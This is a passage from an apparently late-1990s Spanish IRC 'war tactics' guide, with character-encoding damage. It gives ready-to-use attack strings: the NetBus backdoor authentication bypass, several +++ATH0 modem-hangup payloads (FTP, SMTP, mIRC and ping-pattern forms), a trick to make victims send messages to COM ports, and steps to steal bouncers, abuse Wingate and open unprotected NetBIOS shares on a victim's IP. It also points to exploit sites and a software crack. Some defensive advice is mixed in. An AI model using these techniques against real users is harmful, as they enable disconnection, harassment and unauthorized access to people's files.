cliente del BO puede ser un back-door en favor de los creadores del programa. Si monitorizamos el trßfico de red mientras corremos este programa (con un "netstat", sin ir mßs lejos) se puede observar que se abre una conexi≤n hacia el puerto 80 (httpd) del site de los creadores del programa, lo que en principio parece no tener demasiado sentido en lo que respecta a las funciones del cliente. 3.14.4.- NetBus.- Se trata de una herramienta similar al BO, en ciertos aspectos incluso mßs avanzada, ya que aparte de soportar todas las funciones del BO, presenta funcionalidades extra como pueden ser abrir/cerrar la unidad de CDROM, mandar cuadros de dißlogo interactivos para poder hacer chat con el sistema comprometido o escuchar el micr≤fono de dicho sistema. Funciona en Windows 95 / 98 / NT. Esta es la pßgina oficial del programa: http://members.spree.com/SIP/NetBus/ NetBus escucha los puertos 12345 y 12346 de TCP. No usa encriptaci≤n y los comandos tienen el siguiente formato: <Comando>;<Arg1>;<Arg2>;...;<Argn> Por defecto, el servidor NetBus se llama "Patch.exe". Es posible ponerle password, el cual se guardarφa sin cifrar en la entrada de registro "HKEY_CURRENT_USER\Patch\Settings\ServerPwd". El cliente se autentificarφa mandando una cadena con el formato "Password;0;mi_password", aunque si en vez de un 0 ponemos un 1, conseguiremos autentificarnos con cualquier password. Esto es un back-door que contiene el propio programa. * C≤mo detectarlo: C:\WINDOWS>netstat -an | find "12345" TCP 0.0.0.0:12345 *:* * C≤mo eliminarlo: hay diferentes formas para hacerlo, dependiendo de la versi≤n de que se trate. Versi≤n 1.5x: http://members.spree.com/NetBus/remove_1.html Versi≤n 1.6: http://members.spree.com/NetBus/remove_2.html Para esta ·ltima versi≤n, tambiΘn es posible eliminarlo remotamente haciendo telnet al puerto 12345 y mandando lo siguiente (sin las comillas): "Password;1;"<Enter>"RemoveServer;1"<Enter> Esto ·ltimo funciona incluso existiendo password, aunque no se borra el fichero .exe, lo que deberß hacerse manualmente. * Al igual que ocurrφa con el BO, lo mßs c≤modo para detectar / eliminar este back-door es usar un anti-virus actualizado, como puede ser el "AntiViral Toolkit Pro <http://www.avp.ru/>" (AVP). 3.15.- Hanson. Afecta al cliente mIRC 5.3x con el puerto 113 (ident) abierto. Se consigue matar al programa cliente o ralentizar mucho el sistema (Windows 95/NT). La idea es mandar al puerto especificado cadenas mßs largas de las que admite el buffer interno de mIRC provocando un "crash" del programa. 3.16.- Modem DoS.- Las tΘcnicas que a continuaci≤n paso a explicar atacan directamente al modem o al puerto al cual estß conectado el mismo y consiguen romper la conexi≤n con nuestro ISP. 3.16.1.- /Msg ComX.- Funciona con algunos clientes de IRC (preferentemente en versiones antiguas). Consiste en que cualquier mensaje (via /msg) que se envφe a un usuario cuyo nick coincida con un nombre l≤gico de puerto (com1, com2, ..., lpt1, ..., aux, ...) es directamente enviado al puerto en cuesti≤n y no al usuario de IRC. Estamos, pues, mandando datos arbitrarios a un puerto, lo cual tendrß resultados impredecibles y conducirß a error. Si el puerto usado es aquel al cual estß conectado el modem (usualmente com2), estropearemos la conexi≤n que se estuviera llevando a cabo en ese momento. Queda claro que la vφctima de este bug es quien realiza el /msg; por tanto, nuestra intenci≤n como atacante serß enga±ar a la vφctima para que mande ese /msg. * Ejemplo: Atacante: /nick com1 /msg victima Oye, ┐estßs ahφ? Vφctima: /msg com1 Sφ, dime. (ahora si todo va bien se le habrß colgado el rat≤n, que es el dispositivo que suele estar en com1). Atacante: /nick com2 /msg victima ┐Me respondes o no? Victima: /msg com2 íYa lo he hecho antes! (ahora se habrß quedado sin conexi≤n, puesto que com2 suele ser normalmente el modem). * La mejor forma de evitar este ataque es tener un cliente mφnimamente actualizado. Otra posible manera es ignorar los mensajes del atacante, para no caer en tentaci≤n :-). Por ejemplo, poniendo en /ignore a com1!*@*, com2!*@*, Θtc. 3.16.2.- +++ATH0.- Este es un viejo ataque pero que sorprendentemente sigue siendo perfectamente vßlido para colgar un modem (y por tanto, la conexi≤n al ISP) en muchas ocasiones. Es bastante poderoso, asφ que por favor, no abuses de Θl. Para comprender su funcionamiento hay que explicar antes algo sobre modems. Vamos a ello. La mayorφa de modems usan un juego de comandos conocido como "Hayes". A travΘs de estos comandos se puede enviar cualquier orden interna al modem o incluso configurarlo. Un comando-ejemplo muy conocido es "ATDTxxxxxx", que le indica al modem que marque por tonos el n·mero xxxxxx. El comando que nos serß de utilidad ahora serß "ATH0". La respuesta del modem a este comando es que rompe la conexi≤n actual, o sea, "cuelga el telΘfono". Si logramos que la vφctima mande ese comando a su propio modem, Θste desconectarß. Esa es la idea. Para que el modem entienda que los datos que se le estß mandando son comandos, Θste debe estar en lo que se conoce como "modo de comandos". Sin embargo, nosotros vamos a intentar mandar el comando estando el modem ya conectado al ISP y funcionando, por lo que Θste no estß en principio aceptando comandos sino "datos". Tenemos que, de alguna forma, forzar a que el modem entre en el modo de comandos. Para Θsto, basta con lanzar una secuencia de "c≤digos de escape". Esta secuencia o evento fuerza a que se conmute al modo de comandos, de forma que los datos que vengan a continuaci≤n el modem los entiende como comandos. El c≤digo de escape estß definido en el registro S2 del modem y por defecto, es el 43 ("+"), de forma que la secuencia para entrar en modo de comandos es "+++". Detrßs irφa el comando a lanzar, que seg·n lo visto, va a ser un "ATH0". Asφ y con todo, la cadena de caracteres completa que la vφctima debe enviar a su modem queda como "+++ATH0", que es el nombre que usualmente se da al ataque. Visto Θsto, queda por saber c≤mo podemos aprovecharnos de esta caracterφstica. ┐C≤mo podemos lograr que la vφctima mande esa cadena a su propio modem? Basßndonos en que el protocolo PPP, que es el normalmente usado para conectar por modem a nuestro ISP, por defecto no comprime los paquetes IP que viajan sobre Θl, si la vφctima manda un paquete IP de datos hacia el exterior que contenga la cadena "+++ATH0", lo que ocurrirß es que dicho paquete se encapsularß en una o varias tramas PPP, y dichas tramas se enviarßn hacia el modem, para que Θste las transmita por la linea telef≤nica, pasando la cadena "+++ATH0" de forma transparente a travΘs del modem. Entonces el modem interpretarß el "+++" como la secuencia de escape y ejecutarß el comando "ATH0", que viene a continuaci≤n, que obliga al modem a desconectar. Desde el punto de vista del atacante, para forzar a que la vφctima mande la cadena "+++ATH0", hay muchas maneras posibles. Veamos unos ejemplos. * Ejemplo 1: [maquina@atacante]$ telnet 192.168.1.1 21 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. 220 foo FTP server (Version wu-2.4.2-academ[BETA-15](1) Fri Dec 12 20:41: USER +++ATH0 ^] telnet> close Connection closed. [maquina@atacante]$ telnet 192.168.1.1 21 Trying 192.168.1.1... telnet: Unable to connect to remote host: Network is unreachable [maquina@atacante]$ La explicaci≤n es simple. Hemos hecho un ftp via telnet. Cuando nos ha preguntado el usuario, le hemos dicho que era "+++ATH0". Acto seguido el servidor ftp, o sea, la vφctima, debi≤ responder con algo como "331 Password required for +++ATH0.". Vemos que la vφctima ha mandado sin querer la temida cadena para que el modem cuelgue ;-). * Ejemplo 2: Conectamos al puerto 25 ("sendmail") de la vφctima y le mandamos: HELO blah.com VRFY +++ATH0 La vφctima mandarφa la malΘfica cadena en una respuesta como: 550 +++ATH0... User unknown * Ejemplo 3: Desde mIRC: //raw NOTICE NickVictima : $+ $chr(1) $+ PING +++ATH0 $+ $chr(1) * Ejemplo 4: [maquina@atacante]# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx PATTERN: 0x2b2b2b415448300d PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes --- xxx.xxx.xxx.xxx ping statistics --- 5 packets transmitted, 0 packets received, 100% packet loss [maquina@atacante]# La opci≤n "-p" permite especificar un "pattern" que servirß para rellenar el paquete de ping ("ICMP ECHO_REQUEST"). La vφctima responderß con un "ICMP ECHO_REPLY", conteniendo el mismo pattern. El pattern estß codificado en hexadecimal y se traduce como "+++ATH0<CR>". No todos los programas de ping soportan esta opci≤n. - - - - - - * Nota: en todos los casos, el atacante tambiΘn envφa la cadena "+++ATH0", por lo cual si Θste es vulnerable, su modem caerß y el ataque se habrß vuelto contra el propio atacante. * Modems vulnerables: no todos los modems son vulnerables a este ataque. Los modems "buenos", o sea, que soportan "Hayes" estrictamente (la patente) no son vulnerables. Esto es porque la norma especifica que despuΘs de recibir la secuencia de escape y antes de ning·n comando, debe pasar un intervalo de tiempo "vacφo" de 1 seg. L≤gicamente, en nuestro ataque va todo (secuencia + comando) seguido, sin pausa, por lo que el ataque no serφa efectivo. Un ejemplo de modem no vulnerable es el US Robotics. Sin embargo, hay otros muchos modems que no siguen la patente; en particular, parece que todos aquellos que contienen el chipset Rockwell, que son bastante frecuentes hoy en dφa. Ejemplo: Diamond SupraExpress 56k. * En todo caso, una forma de protegerse es deshabilitar la entrada manual al modo de comandos. Esto se hace cambiando el c≤digo de escape (que por defecto es un 43 ["+"]), y poniendo un valor de 255. La mayorφa de los modems reconocen un valor por encima de 127 como deshabilitador manual del modo de comandos, pero otros necesitan un valor superior. Para estar mßs seguros, usamos 255. El comando completo serφa: ATS2=255 y se podrφa introducir en la cadena de inicializaci≤n del modem (configurable normalmente en propiedades del modem o en la utilidad de dial-up), de forma que se "ejecute" siempre antes de marcar hacia nuestro ISP. * TambiΘn es posible parchear remotamente un host dado usando la misma tΘcnica del "ping -p" vista para atacar: ping -c 1 -p 2b2b2b415453323d32353526574f310d host (el pattern usado equivale a: "+++ATS2=255&WO1"). De forma anßloga, podemos mandar otros comandos remotos, provocando, por ejemplo, que el modem de la vφctima marque a donde nosotros queramos, Θtc. íMuy peligroso! 4.- Spoofing. Esta tΘcnica no es un ataque en sφ pero permite mejorar y perfeccionar cualquier ataque (de los anteriores, por ejemplo). TambiΘn puede ser la base de alg·n ataque, como ocurre con el IP Spoofing que los hackers suelen emplear (me desviarφa del tema de este escrito si siguiese escribiendo...). Se trata de "spoofear" (=falsear) la direcci≤n IP de origen de los paquetes que se mandan a la vφctima, de forma que Θsta crea que el origen de dichos paquetes es otro (el que nosotros le indiquemos). De esta forma protegemos nuestro anonimato, y en general podemos llevar a cabo cualquier acci≤n que se nos pueda ocurrir y que se derive de una falsa direcci≤n source (origen). Por ejemplo, podemos nukear a alguien, con la direcci≤n fuente de otro, haciendo creer a la vφctima (si Θsta tiene un analizador de paquetes o algo parecido) que es el otro el que le estß atacando }:-). El spoofing es (o podrφa ser) una funcionalidad mßs del programa de ataque (del nuker, del ping, ...). Como consiste en manejar IP desde un muy bajo nivel en muchos casos se requieren privilegios especiales. Por ejemplo, en el caso de mßquinas Unix, se necesita abrir "raw sockets" y Θsto requiere de privilegios de superusuario (root). Para los interesados en el tema os remito a las siguientes direcciones: * IP-spoofing Demystified Trust-Relationship Exploitation by daemon9 / route / infinity <http://www.fc.net/phrack/files/p48/p48-14.html> * IPSPOOF.C (Spoofing source) <http://www.ilf.net/Toast/files/unix/ipspoof.c> * This site contains both spoofing code, an analysis of that spoofing code and a good description of how to implement such attacks: ~http://main.succeed.net/~coder/spoofit/spoofit.html 5.- TΘcnicas avanzadas. Aquφ me propongo a describir con la mayor simplicidad posible algunas tΘcnicas mßs o menos avanzadas (algunas son realmente difφciles de implementar y suelen ser usadas por hackers) para que por lo menos sepais de su existencia. 5.1.- Bouncing.- Consiste en usar una mßquina (host) intermedia para mantener una comunicaci≤n TCP "virtual" entre dos mßquinas (situadas una a cada lado). El esquema serφa algo asφ como: Host A <---> Bouncer <---> Host B (1) (2) Todos los datos que A tiene para B son enviados al bouncer. Este se encarga de reenviarlos a su destino (B). De igual forma ocurre en el otro sentido. El bouncer act·a de elemento redireccionador en ambos sentidos. La mßquina intermedia corre un programa especial (daemon) llamado "bouncer". A menudo nos referiremos tambiΘn con el mismo tΘrmino a la mßquina intermedia (i.e. la que corre el soft especial), de la misma forma que se ha asumido al dibujar el esquema. Dicho programa usa dos puertos TCP previamente definidos, uno por cada conexi≤n (A<->Bouncer, Bouncer<->B), y hace de pasarela entre ellos (tal y como se ha explicado). Por tanto, mantiene por separado dos conexiones TCP diferentes pero las "enlaza" de forma que en su conjunto parezca una ·nica conexi≤n TCP (de ahφ lo de "virtual") entre A y B. La ventaja que Θsto conlleva es que ocultamos nuestra identidad a los ojos de B, ya que Θste solo ve la comunicaci≤n que mantiene con el host intermedio (2) (y no tiene por quΘ saber que se trata de un host haciendo de bouncer). A esta tΘcnica se le puede dar diferentes usos, todos ellos basßndonos en la principal ventaja descrita en el pßrrafo anterior. En lo que al IRC concierne es ampliamente usada para saltar bans o K/G-Lines. Lo vemos con un ejemplo. Supongamos que nosotros somos el host A y que no podemos entrar a ning·n servidor (B) de una red IRC por estar baneados permanentemente. ┐QuΘ hacer? Pues hacemos uso de una shell en otro host (que va a ser el intermedio) y colocamos allφ un bouncer. Al programa, que se quedarß corriendo en segundo plano (background), le tenemos que dar dos datos: el puerto que estarß permanentemente escuchando (por donde recibirß nuestra conexi≤n) y el host y puerto destino (a donde intentarß conectarse) correspondientes a B. Ahora, cuando queramos conectarnos al IRC lo hacemos al primero de los puertos predefinidos (correspondiente al host que alberga el bouncer). Automßticamente el bouncer redireccionarß nuestra petici≤n hacia B (el servidor IRC) y estaremos dentro (ísaltßndonos el ban o lo que sea!) ya que hemos llegado a travΘs de un host que no tenφa ning·n ban. A todos los efectos el servidor IRC cree que nuestro host es el bouncer. Asφ, al hacernos cualquier otro usuario un /whois íverß el hostname del bouncer! (Θsto es otra ventaja ya que no nos pueden mandar ataques como OOB's o Sspings, por no saber nuestra verdadera direcci≤n IP). Es una buena forma de garantizar nuestro anonimato =). Hay que tener en cuenta que un bouncer es algo fßcil de "robar": 1.- Exploramos la red IRC en busca de alg·n usuario que estΘ usando bouncer. Para ello basta con hacer /whois a distintos usuarios y fijarnos en el hostname que nos sale. Podemos asumir que presumiblemente se trata de un bouncer si es una IP fija (alguna mßquina de una universidad, por ejemplo) y al hacer /finger @host no vemos ning·n usuario conectado. Esto ·ltimo no siempre se puede ver ya que muchos hosts deshabilitan este servicio por el potencial problema de seguridad que puede acarrear. 2.- Hacemos un PortScan a dicho host (se van mandando sucesivas peticiones de conexi≤n TCP a los distintos puertos de la vφctima, recorriendo el rango de puertos deseado, y a la vez escuchando las respuestas que nos llegan; s≤lo contestarßn los puertos "activos" asφ que es una manera de ver los puertos abiertos que tiene una mßquina). 3.- Normalmente un bouncer se coloca en los puertos no privilegiados (es decir, a partir del 1024), tφpicamente en el rango 1024 a 10000, por decir algo, aunque en realidad en principio no hay ninguna restricci≤n en cuanto al n·mero de puerto usado. Asφ que podemos seleccionar a ojo unos cuantos puertos que son candidatos posibles a bouncer :). 4.- Intentamos conectarnos a dichos puertos con nuestro cliente IRC habitual y vemos si alguno/s lo hace/n. 5.- Si conseguimos entrar al IRC por alguno de esos puertos ya tenemos bouncer =). Para evitar abusos como el anterior se suele usar alg·n tipo de autentificaci≤n en el bouncer, como podrφa ser poner password de entrada. 5.2.- Wingate.- Wingate es un programa com·nmente usado para dar conectividad a Internet a varios ordenadores usando un ·nico modem. (supongo que tendrß mßs funciones pero tampoco interesa para nuestros prop≤sitos). Es un programa bastante peligroso por los problemas de seguridad que implica, al menos en versiones no muy modernas. Uno de los bugs que tiene es que permite acceso vφa puerto 23 (telnet) sin pedir password y desde ahφ se puede saltar a cualquier otra mßquina. Es decir, podemos usar Wingate para hacer bouncing sin necesidad de preocuparnos de buscar o hackear una shell de por ahφ =). Por tanto, la cosa es tan fßcil como encontrar alg·n host que corra Wingate (que los hay). TambiΘn hay otro bug que te permite el acceso al HD del host corriendo Wingate aunque no serß materia de este artφculo al no tener nada que ver con el IRC. Busca en pßginas de hack :-P. Soluci≤n: aparte de usar siempre la ·ltima versi≤n de Wingate, aconsejo mejor usar otras alternativas mßs eficientes, menos peligrosas y mßs baratas como puede ser un Linux corriendo IP-masquerade. 5.3.- DNS Inject.- Con esta tΘcnica conseguimos spoofear nuestro hostname, es decir, que un servidor nos asocie el nombre de host que queramos (y no el que tiene realmente, que es ·nico) (en realidad, puede haber mßs de uno, pero s≤lo uno es el real, lo que se conoce como "canonical name" mientras que los demßs son simples "aliases"). La explicaci≤n detallada es compleja y excede los objetivos de este documento. A tφtulo informativo paso a esbozar o perfilar lo que serφa el Inject. Cada servidor (ya sea de IRC, ftp, Θtc) tiene asociado uno o mßs "servidores de nombres" (NS, del inglΘs: Name Server) que resuelven todas las peticiones de conexi≤n que le llegan: para cada IP que peticiona conexi≤n buscan y almacenan el hostname correspondiente para su posterior uso. El proceso serφa el siguiente: - un usuario de la mßquina A intenta conectarse a un puerto de la mßquina B (el servidor IRC, ftp, ...). - B recibe la direcci≤n IP desde la que peticionamos (la de A) y se la entrega a C (otro host: el NS) para que la resuelva. - C resuelve y devuelve su respuesta a B. - B se "cree" la respuesta y la cachea en memoria. Ahora tiene un par IP-hostname. A partir de este momento nosotros estamos identificados en el servidor con el hostname dado anteriormente por el NS. Como se puede intuir el truco estß en forzar al NS a que de una respuesta falsa (siempre en favor nuestro :-)). Digamos que modificamos los datos del NS para que responda a nuestra IP con el hostname que nosotros queremos y no con el que deberφa hacerlo realmente. Se dice que hemos "inyectado" (injectado, en inglΘs :-P) el NS. El c≤mo hacer esto ·ltimo es lo complicado y s≤lo voy a decir que el truco se basa en la "resoluci≤n recursiva" de los NS (cuando un NS no sabe la respuesta a la petici≤n que le ha llegado lanza una nueva petici≤n a otro NS, que posiblemente sφ sepa la respuesta, y asφ sucesivamente --> de ahφ la "recursividad") y en tener finalmente un NS trucado que de respuestas falsas y que nosotros reprogramamos a nuestro gusto. La principal ventaja es una vez mßs el anonimato (aparte de poder ir vacilando por el IRC con una identidad del tipo root@nasa.gov :-O). 5.4.- Recursos compartidos.- El protocolo Netbios permite compartir recursos (impresoras, discos duros, Θtc) de un ordenador con otros conectados al primero a travΘs de la red. De esta forma, podemos acceder remotamente a los recursos de una mßquina dada: leer ficheros, modificarlos, escribirlos, enviar alg·n documento a una impresora remota... El abanico de posibilidades es amplio. Los problemas vienen cuando este servicio estß disponible "p·blicamente" sin contrase±a de acceso: nuestro disco duro estarß "abierto al p·blico" }:-). Cualquier hacker podrß leer ficheros nuestros, borrarlos, introducir troyanos... en fφn, nada bueno. Un gran fallo de Windows 95 (corregido en versiones posteriores, creo que a partir del OSR2) es que los recursos no tienen password por defecto con lo cual si activamos Netbios, ya sea para utilizarlo o por descuido, y se nos olvida proteger los recursos con password tendremos un gran agujero de seguridad en nuestra mßquina. Esto no ocurre asφ en Windows 98 ni Windows NT. A pesar de que este problema es ampliamente conocido todavφa se ve por el IRC a mucha gente con su disco duro compartido (ípobres... y ellos sin saberlo!). Los pasos para ver si una mßquina (IP) dada comparte recursos y para utilizarlos son, *desde Windows NT*, los siguientes: 1.- Asegurarnos de que tenemos el soporte Netbios instalado. 2.- Desde el shell (command.com, ndos, 4dos, Θtc) hacer: c:\> nbtstat -A 195.69.69.69 Notas: - la IP dada se supone que es la de la vφctima - es importante poner -A y no -a - no vale un hostname, s≤lo direcci≤n IP. 3.- Para que tengamos posibilidades deberß salir algo como lo siguiente: NetBIOS Remote Machine Name Table Nombre Tipo Estado --------------------------------------------- SKORPIO <03> UNIQUE Registrado ADMINISTRADOR <03> UNIQUE Registrado SKORPIO <00> UNIQUE Registrado INSULTOZ <00> GROUP Registrado SKORPIO <20> UNIQUE Registrado Direcci≤n MAC = 00-00-00-00-00-00 Debe haber al menos una entrada de tipo <20> para que tengamos algo que hacer ;-). 4.- Men· Inicio -> Ejecutar. Introducimos en el cuadro de dißlogo: \\195.69.69.69 5.- Ahora puede que nos aparezca otro cuadro de dißlogo solicitßndonos contrase±a (en cuyo caso en principio no tenemos nada que hacer... aunque podrφamos intentar passwords comunes como el nombre o nick de la persona, Θtc) o bien directamente se abrirß una nueva ventana donde se muestran los recursos compartidos. Pinchando sobre el que queramos tendremos acceso a Θl. La soluci≤n a este grave problema de seguridad es tan simple como proteger los recursos con contrase±a o simplemente no activar el servicio Netbios si no se va a necesitar. TambiΘn podemos bloquear los puertos que ofrecen este servicio (en especial el 139) mediante firewall. 6.- Defensa. En esta secci≤n me gustarφa dar unas pinceladas generales acerca de c≤mo defendernos de ataques e intrusiones. Las formas de defensa ante determinados ataques en particular no se tratan aquφ pues se suponen cubiertas en los distintos apartados correspondientes a los ataques. 6.1.- Firewall.- Un "firewall" o "muro de fuego" es un programa (software o hardware) que filtra los paquetes que entran o salen a travΘs de los distintos interfaces de red seleccionados, en base a unas reglas ("rules") previamente definidas. Se tienen 2 tipos de reglas: - de entrada: afectan a los paquetes entrantes, es decir, a los que provienen del exterior. - de salida: afectan a los paquetes salientes, es decir, que van hacia el exterior. Otra clasificaci≤n es: - "accept": si el paquete cumple los requisitos dados por la regla Θste se dejarß pasar. - "deny" o "ignore": si el paquete cumple los requisitos dados por la regla Θste no se dejarß pasar (se ignorarß). - "reject": si el paquete cumple los requisitos dados por la regla Θste no se dejarß pasar y ademßs se notificarß al remitente del paquete el correspondiente mensaje de error. Entre otras cosas, lo que caracteriza a un firewall es la flexibilidad a la hora de decidir si un paquete debe atravesar o no el firewall, o lo que es lo mismo, la capacidad de definir y tratar diferentes reglas para reflejar diferentes situaciones. Las reglas se pueden basar en cualquiera de los campos que pueda tener un paquete: tipo de paquete, longitud, protocolo, direcci≤n origen, direcci≤n destino, Θtc. TambiΘn es posible combinar varios de ellos. Por ejemplo, una regla podrφa ser: "no dejar pasar paquetes IP entrantes provinientes de la subred IP 195.69.69.* y que vayan destinados al puerto 23 TCP". En este caso tendrφamos una regla de entrada que bloquea el servicio telnet (habitual del puerto 23). Ademßs de las funciones de bloqueo, un firewall suele tener funciones a±adidas como el logeo de los distintos eventos que ocurran (por ej. "se ha tirado [drop] el paquete proviniente de tal direcci≤n en base a la regla x"). Centrßndonos en el tema que nos concierne -el IRC- podemos usarlo por ejemplo para filtrar client icmp-nukes. La idea es a±adir una regla de entrada diciendo algo asφ como "ignorar todos los paquetes ICMP de tipo unprotocol" (en este caso filtrarφamos el nuke normal y no otros tipos). ┐QuΘ firewall es el mejor para nuestros prop≤sitos? Deberφamos buscar algo a la vez flexible y simple (caracterφsticas que suelen ir enfrentadas; habrß que llegar a un compromiso entre las dos), que cumpla con nuestros requisitos de la forma mßs eficiente, funcione con nuestro modem o tarjeta de red y que sea lo mßs barato posible. La pen·ltima caracterφstica es muy importante ya que muchos firewalls no tienen soporte para modem y s≤lo funcionan con tarjeta de red, la cual no es habitual que se tenga si ·nicamente tenemos un ordenador conectado a Internet por PPP mediante alg·n ISP. Hay diversas ofertas y no voy a tratarlas todas. Tan s≤lo aconsejarΘ unos cuantas y darΘ las razones que me han llevado a ello. En Linux se puede usar el paquete "ipfwadm", que viene por defecto en la mayorφa de distribuciones. Es un poco tedioso a la hora de configurar pero es totalmente gratuito. Para Windows 95 la mayorφa de usuarios optan por el "ConSeal PC fw <http://www.signal9.com>", que es fßcil de usar y que aunque es comercial se puede descargar de la web en versi≤n demo y aplicarle el siguiente crack <ircutils/conseal.zip> (v.1.0) para hacerlo totalmente operativo de forma gratuita. Advierto que el uso de cracks estß penado por la ley (pero no el hecho de tenerlos). Ya que este crack estß ampliamente difundido por la Red he pensado que no estß de mßs facilitar la tarea de b·squeda a nuestros queridos lectores :-). En Windows NT he tenido mßs problemas para buscar firewall, aunque al final... :-). El problema es que no se encuentran por ning·n lado serials/cracks para los firewalls existentes o en caso de haberlos no soporta el uso de modem. Por nombrar algunos de los mejores y que creo que soportan modem tenemos: - "Check Point FireWall-1 <http://www.checkpoint.com>" - "TIS Gaunlet <http://www.tis.com>" - "NetGuard Guardian <http://www.ntguard.com>" - "ConSeal PC fw <http://www.signal9.com>" 7.- Resources. Este apartado estß dedicado, brevemente, a los distintos programas disponibles y ·tiles a nuestra causa :-). Por ahora no voy a subir ning·n programa a este servidor ya que puedes encontrar *TODO* tipo de programas de IRC-War (icmp-nukers, bouncers, flooders, link-lookers, port-listeners, port-bombers, port-scanners, Θtc) en: <http://www.warforge.com/dos/index.html>. PodrΘis encontrar muchφsimos scripts para mIRC y una secci≤n interesante sobre el bot Eggdrop en: <http://www.xcalibre.com>. Los ·ltimos exploits y programas que explotan los bugs mßs recientes aparecen en: <http://www.rootshell.com>. <http://www.insecure.org>. Como he visto que hay interΘs por el tema del "DNS-Inject" y no estoy por la labor de ampliar dicho apartado (perdonad la flojera: queda prometido para futuras revisiones del doc., sources incluidos), os remito a un excelente artφculo sobre el tema: <http://hispahack.ccc.de/mi004.htm>. Una herramienta comercial llamada "Aggressor", que permite spoofear y lanzar multitud de ataques (land, jolt, Θtc) desde Windows la podeis ver en: <http://www.aggressor.net>. Mßs informaci≤n tΘcnica sobre IRC (ataques, defensas y mucho mßs) -todo en espa±ol- y con multitud de links en: ~http://www.argo.es/~jcea/irc <http://www.argo.es/jcea/irc>. Todo sobre la red Hispana de IRC (servidores, info, Θtc) en: <http://www.irc-hispano.org>. Por ·ltimo me gustarφa recordar la "Home Page" de este documento, donde encontrareis siempre la versi≤n mßs reciente del mismo (es la que debeis usar en vuestros enlaces). Esta es la pßgina oficial de "Tßcticas de guerra en el IRC": ~http://www.esi.us.es/~roman/tacticas.html 8.- Feedback (FAQ). En este apartado incluirΘ las preguntas mßs frecuentes que me habeis formulado via e-mail algunos de vosotros, para que no se vuelvan a repetir. No pienso contestar mails de forma particular asφ que no espereis respuesta sino a la pr≤xima versi≤n del documento. Ni quΘ decir tiene que antes de preguntar leas esta secci≤n; lo mismo alguien tuvo tu duda antes que t· ;-). 1.- ┐QuΘ script de guerra me aconsejas? R.- Un script es simplemente algo para simplificar/automatizar tareas. Ning·n script es realmente imprescindible tanto para atacar como para defenderse, aunque como digo, en algunos casos sφ que puede facilitar la tarea. En este sentido no deberφamos preocuparnos tanto por el script que usamos, sino mßs bien de tener nuestro sistema correctamente parcheado y protegido y de estar al dia en programas/utils de guerra. Hoy en dφa (casi) todos los scripts cumplen perfectamente en cuanto a defensa se refiere. Para el ataque un script es tanto mejor cuanto mßs utilidades (=programas) traiga. Por si os sirve de algo yo uso el 7th Sphere 2.666, ya bastante anticuado, pero que me sigue valiendo casi como el primer dφa. 2.- ┐C≤mo puedo compilar los programas que se listan en el artφculo en mi Windows? R.- Simple: NO puedes. Estos programas estßn escritos para entornos UNIX, asφ que solo podrßs compilarlos y correrlos en sistemas operativos de esa familia (como por ejemplo, Linux). No obstante, en algunos casos hay versiones disponibles para otros sistemas operativos. Por ejemplo, cuando el ataque OOB se puso de moda surgieron diversas utilidades que lo implementaban desde Win95. 3.- ┐Y d≤nde puedo encontrar dichas utilidades? R.- En la secci≤n de "resources" hay una URL que es muy buena y donde podrßs encontrar de todo. Otra opci≤n es utilizar alg·n buscador y localizar alguna pßgina de IRC-War. Los programas tφpicos se encuentran en la mayorφa de estas pßginas, por muy malas que sean. TambiΘn puedes buscar webs de H/P/C/V; normalmente todo el material underground se encuentra focalizado en diversos puntos de la Red centrados ampliamente en esa temßtica. Quiero decir que donde hay cosas de Hacking suele haber tambiΘn cosas de IRC-War, Phreaking, Virus, Cracking... en fin, todos esos temas que tanto nos atraen suelen estas relacionados :-). 4.- ┐C≤mo detectar a alguien que me haga un nuke? R.- Todos los paquetes que llegan a tu ordenador por el interface de red pueden ser logeados o "visualizados" con la herramienta correspondiente. Sin embargo, hay que tener en cuenta que estos paquetes pueden venir falseados (spoofeados) con lo cual la informaci≤n que obtengamos no siempre es verφdica. De hecho, esto es lo que ocurre con la mayorφa de los ·ltimos ataques, en los cuales siempre se usa spoof. No obstante, un icmp-nuke normal no suele venir spoofeado y se puede detectar fßcilmente (obviamente me estoy refiriendo a un client nuke; si el paquete no te llegara a tφ sino al servidor t· no te enterarφas de nada). Cualquier programa analizador de paquetes puede valernos. Valgan como ejemplo: - las propias funciones de logeo que implementa "de casa" el dialer y pila TCP/IP "Trumpet Winsock" (para los que conecten de esta forma, sin usar el dialup de Windows). - idem para cualquier programa firewall, como el "Conseal". - "tcpdump" o "sniff-it" para UNIX. - "ICMP Watch" para Windows. 5.- ┐Puedo evitar los (client) icmp-nukes? R.- Sφ, solo tienes que filtrar los mensajes ICMP que te envφen. Esto lo puedes hacer con cualquier software firewall. En Win95 es bastante usado el Conseal. 6.- En la red xxxxxx hay un tφo que siempre me estß molestando y no deja de atacarme. ┐Puedes ayudarme? R.- Si he escrito este documento es para ayudar a la gente y sobre todo, para que lo lea. :-P Asφ que usa la informaci≤n que aquφ se encuentra e intenta sacarle provecho por tφ mismo en vez de pedir ayuda a terceros. No tengo tiempo para centrarme en casos particulares, a lo mejor ni siquiera conozco la red xxxxxx. Si tienes alguna duda contacta conmigo y si lo considero conveniente aparecerß solucionada en esta misma secci≤n en la siguiente revisi≤n del documento. 7.- ┐C≤mo puedo garantizar mi anonimato en IRC? Actualmente he recibido e-mails con amenazas e insultos de gente de los canales que frecuento, ┐c≤mo puedo evitarlo? R.- Una de las ventajas del IRC es precisamente que guarda el anonimato. Todos los datos que el servidor IRC tiene y puede ofrecer sobre un usuario dado son los que previamente uno ha introducido en su cliente IRC, a excepci≤n de la direcci≤n IP desde donde nos conectemos. Por tanto, podemos introducir datos falsos: nombre falso, direcci≤n de correo falsa, Θtc. Lo ·nico que en principio no se puede esconder es tu direcci≤n IP, que la toma el servidor en el momento de hacer tu conexi≤n TCP al servidor de IRC. Sin embargo, hasta esta ·ltima se puede esconder usando algunas de las tΘcnicas descritas en este documento, como el bouncing o el DNS Inject, lo que nos harφa completamente an≤nimos. 8.- El otro dφa entrΘ en un canal y me dijeron que tenφa el puerto 139 abierto... que podφan resetearme... ┐C≤mo lo puedo cerrar? R.- Puedes tener el puerto 139 abierto sin que "te puedan resetear": es cuesti≤n de tener el parche contra OOB instalado en tu sistema. De hecho, es un parche obligado. Ademßs no solo es vulnerable el puerto 139. No obstante, si lo quieres cerrar, solo tienes que desinstalar el soporte Netbios (en la configuraci≤n de red). S≤lo necesitas tener soporte TCP/IP para conectarte a Internet; todo lo demßs 